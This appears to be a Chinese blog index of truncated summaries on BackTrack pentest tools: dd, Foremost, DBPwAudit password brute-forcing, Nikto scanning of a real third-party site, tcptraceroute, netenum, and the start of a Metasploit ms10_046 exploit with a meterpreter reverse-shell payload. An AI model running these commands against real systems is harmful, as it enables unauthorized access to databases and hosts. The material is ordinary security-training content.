摘要：dd（取证工具）它是 Linux/UNIX 下的一个非常有用的工具，作用是用指定大小的块拷贝一个文件，并在拷贝的同时进行指定的转换。root@bt:~# dd if=/dev/sda1 of=/dev/hda1/forensic.imageForemost（数据恢复工具）一款开源的取证工具，可以快速恢复硬盘上已删除的office文档、jpg、pdf等文件。配置文件：/usr/local/etc... 阅读全文

摘要：DBPwAudit — DataBase Password Audit 功能：通过挂载字典对目标数据库进行密码暴力猜解，目前支持的数据库包括SQLServer、MySQL、Oracle、DB2 。程序位置：/pentest/database/dbpwaudit/ 驱动位置：/pentest/database/dbpwaudit/jdbc/ //需要自行下载驱动复制到该目录root@bt:/pen... 阅读全文

摘要：Nikto2Nikto2是一款使用perl语言写的多平台扫描软件，是一款命令行模式的工具，它可以扫描指定主机的WEB类型主机名、特定目录、Cookie、特定CGI漏洞、XSS漏洞、sql注入漏洞、返回主机允许的http方法等安全问题适合初级踩点扫描。root@bt:/pentest/web/nikto# ./nikto.pl -h www.baidu.com -o res.htmlroot@bt:... 阅读全文

摘要：tcptraceroute通过发送TCP/SYN数据包来代替UDP或ICMP应答数据包，可以穿透大多数防火墙tcptraceroute 域名tcptraceroute -q 1 -n 域名netenumroot@bt:/pentest/enumeration/irpas# ./netenum 192.168.1.0/24 3 1//扫描目标网段的存活主机，速度快... 阅读全文

摘要：ms10_046_shortcut_icon_dllloader漏洞利用过程msf > use exploit/windows/browser/ms10_046_shortcut_icon_dllloadermsf exploit(ms10_046_shortcut_icon_dllloader) > set PAYLOAD windows/meterpreter/reverse_tcpmsf exploit(ms10_046_shortcut_icon_dllloader) > set SRVHOST 192.168.1.107msf exploit(ms10_046_sh 阅读全文